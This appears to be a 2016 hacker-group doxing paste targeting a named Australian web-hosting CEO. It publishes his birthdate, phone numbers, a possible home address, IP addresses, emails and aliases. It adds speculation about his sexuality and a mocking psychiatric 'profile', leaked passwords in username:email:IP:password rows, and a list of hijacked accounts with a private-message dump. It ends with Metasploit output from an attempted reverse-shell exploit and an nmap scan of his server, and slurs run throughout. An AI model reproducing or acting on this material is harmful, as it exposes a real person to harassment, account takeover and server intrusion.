Untitled


  ____                     _
 |  _ \ ___  ___ _   _  __| | ___
 | |_) / __|/ _ \ | | |/ _` |/ _ \
 |  __/\__ \  __/ |_| | (_| | (_) |
 |_|   |___/\___|\__,_|\__,_|\___/


    RUNNING SHIT SINCE '15

NAIDOXE | BOXXY | TAKU | ELG0D0 | DISARRAY | CBANS | AURA | ABSTERGO | NMBOT

WITH THANKS TO: CHONG - HOME BOI SQUIDWARD - XANAX_GOD - ANONYAUSSIE - VOXI - SHADOW
pseudosec.com


Last updated 2016-02-09 ~
███████████████████████████████████████████████████████████████████████████████████████████
0x00 - PERSONAL INFORMATION.txt


NAME: Huon Rengers
FIRSTNAME: Huon
LASTNAME: Rengers
ALIAS(ES): - John_Cortex
                 - hughau.backup
                 - cortex_admin
                 - cortexnet
                 - cortexnet_john
                 - HughyDEE123
                 - Aussie-GTA5
                 - TechnicalAspects
                 - TechnicalAussie
                 - Techxpert
                 - hughau.backup
                 - hugh-lock
                 - HughAUS
                 - HughAussie
                 - Hughey2011
                 - HughyDEE123
                 - huon008
                 - Huon09
                 - thebro009
                 - OCUPYtaku
                 - HayHACKER
                 - HayHotel2011
                 - RageROCKER
                 - SERVERmember
                 - NetVibeNet
                 - Phoenix1
                 - showgroundapps
                 - HostingCortex

NOTE: More at http://www.digitalfaq.com/forum/web-hosting/4635-details-windows-vps.html#ixzz3zalIC0Bc

GENDER: Male
AGE: 19-20 // Needs Confirmation
BIRTHDATE: 06/08/1994
RELIGION: Agnostic   // Needs confirmation
RACE: White/Australian
SEXUAL ORIENTATION: Gay // Probs needs confirmation
OCCUPATION: CEO of CortexHosting
CELL #: +61 432 880 806
             +61 040 946 7355
CEO INTRODUCTION TO CORTEX HOSTING: http://pastebin.com/uRZCdDLN
BACKUP: (in case of deletion) https://ghostbin.com/paste/65gam
███████████████████████████████████████████████████████████████████████████████████████████
0x10 - COMPUTER INFORMATION.txt

OPERATING SYSTEM: Windows (7/8/10) (Possibly <Ubuntu> Linux for servers)
IP ADDRESS:  Possible IP's: 211.31.251.200, 58.105.158.34, 220.236.249.99 // Needs confirmation
HOSTNAME:
ISP: Phone ISP: Optus Mobile
███████████████████████████████████████████████████████████████████████████████████████████
0x20 - APPEARANCE.txt

http://imgur.com/iMd9N0X  //Confirmed
http://imgur.com/KPf9Zra // Confirmed
http://imgur.com/5OxkA7k // Confirmed
http://imgur.com/jDBUMmy // Confirmed
NOTE FROM BOXXY: IS THERE ANY WAY WE CAN SCRAPE MORE PICS USING FACIAL RECOGNITION?
███████████████████████████████████████████████████████████████████████████████████████████
0x30 - LOCATION INFORMATION.txt

COUNTRY: Australia
CITY: Brisbane
ZIP/POSTAL: Unknown currently
FULL ADDRESS: 11 Ferny Grove Cassimaty St Brisbane QLD 4055*****  // Needs confirmation -- attempting to confirm.
███████████████████████████████████████████████████████████████████████████████████████████
0x40 - ACCOUNTS.txt

Email(s): hughy_tech@yahoo.com
               huon008@gmail.com
               huon09@live.com
               hughaussie2011@gmail.com

YourListen: http://yourlisten.com/HughyDEE123

RageZone: http://forum.ragezone.com/members/2000052080.html

███████████████████████████████████████████████████████████████████████████████████████████
0x50 - NOTES.txt

John Hugh is the CEO of CortexHosting. He is a known scammer and beggar in the webhosting community.

Attributes: Often in denial, manipulative and defensive.

Psychological profile:
May have ASD (Autism Spectrum Disorder) or Asperger's Syndrome, resolved from the way he types/acts:
Sample of writing fist: "I Have Scammed No-one, You Do Not Know The FULL Story, I Was Set-Up".
The use of unecessary capitals and poor grammar possibly indicates a poor childhood or a speaking disorder,
while his frequent denial and acts of scamming which are notorious in the hacking community may be representative of the
Machiavellian Dark Triad : (Narcissism, Machiavellianism and Psychopathy) His astonishing lack of empathy and his constant
almost compulsive lying proves our initial hypothesis. - Boxxy

His emails (more at 0x40) resolved to a couple of Skype usernames:
- tack.hotel.help
- driver.hotel_help
- live:hughaussie2011

Old and/or current domains:
avidhotel.com
avid-hotel.com
earth-hotel.com
flexyhosting.info
showgroundapps.com
cortexhosts.com
███████████████████████████████████████████████████████████████████████████████████████████
0x60 - PASSWORDS & DATABASE ENTRIES.txt

NOTE: These passwords are most likely outdated since they are found in old dropped databases from ~2012

 - pepper08
 - Cortex2015
 - hughaussie2011
 - huonrengers2011
 - retro2011
 - huonrengers2015
 - PenisLuv2016

000webhost
FORMAT: Username : Email : IP address : Password

hugh:hackerleet2010@gmail.com:220.236.71.14:pepper08
hugh:huon008@gmail.com:58.105.158.34:pepper08
Hugh:huon09@live.com:211.31.127.154:pepper08
Hugo:huon.rengers@gmail.com:211.31.127.154:pepper08
hugo:huon009@live.com:58.105.158.34:pepper08
hugo:uber2015@gmail.com:58.105.153.151:pepper08
huon:retro2011@hotmail.com:211.31.240.173:pepper08
███████████████████████████████████████████████████████████████████████████████████████████
0x70 - JACKED ACCOUNTS.txt

http://forums.osgrid.org/index.php
      - Proof: http://imgur.com/G8qtDys  (confirmed via live proof)

huon.rengers@gmail.com
       - Proof: http://imgur.com/rrUyuUs  (confirmed via live proof)

Rage_Rock
   - Proof: http://imgur.com/HAgmFSG (confirmed via live proof)

HackForums     // Suspended, sadly.
       - Proof: http://imgur.com/YdYE40A  (confirmed via live proof)

uber2015@gmail.com
   - Proof: http://imgur.com/xh8Rc61 (confirmed via live proof)
   - Private Message DUMP: http://pastebin.com/raw/Vv6UfPNN

These are confirmed by https://twitter.com/nullingsevers :-)
██████████████████████████████████████████████████████████████████████████████████████████
0x80 - METASPLOIT OUTPUTS (WORKING ON GETTING A SHELL):

msf exploit(nginx_chunked_size) > exploit

[*] Started reverse TCP double handler on 10.12.1.122:4444
[*] 192.124.249.11:80 - Searching for stack canary
[*] 192.124.249.11:80 - Assuming byte 0 0x00
[*] 192.124.249.11:80 - Bruteforcing byte 1
[+] 192.124.249.11:80 - Byte 1 found: 0x02
[*] 192.124.249.11:80 - Bruteforcing byte 2
[+] 192.124.249.11:80 - Byte 2 found: 0x00
[*] 192.124.249.11:80 - Bruteforcing byte 3
[+] 192.124.249.11:80 - Byte 3 found: 0x00
[+] 192.124.249.11:80 - Canary found: 0x00000200

[*] Exploit completed, but no session was created.
██████████████████████████████████████████████████████████████████████████████████████████
0x90 - NMAP RESULTS FOR CORTEXHOSTS.COM BACKEND   -    (202.130.34.2)

Nmap scan report for server1.freweb.com.au (202.130.34.2)
Host is up (0.34s latency).
Not shown: 986 filtered ports
PORT      STATE  SERVICE    VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp        Pure-FTPd
22/tcp    open   ssh        OpenSSH 4.3 (protocol 2.0)
53/tcp    open   domain     ISC BIND 9.3.6-25.P1.el5_11.2
80/tcp    open   http       nginx    ~   Used By Faggots. (lol)
110/tcp   open   pop3       Dovecot pop3d
143/tcp   open   imap       Dovecot imapd
443/tcp   open   ssl/http   Apache httpd 2.2.31 ((Unix) mod_ssl/2.2.31 OpenSSL/1.0.1j mod_bwlimited/1.4)
465/tcp   open   ssl/smtp   Exim smtpd 4.86
587/tcp   open   smtp       Exim smtpd 4.86
993/tcp   open   ssl/imap   Dovecot imapd
995/tcp   open   ssl/pop3   Dovecot pop3d
8080/tcp  closed http-proxy
35500/tcp closed unknown
Service Info: OS: Red Hat Enterprise Linux; CPE: cpe:/o:redhat:enterprise_linux

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.98 seconds
██████████████████████████████████████████████████████████████████████████████████████████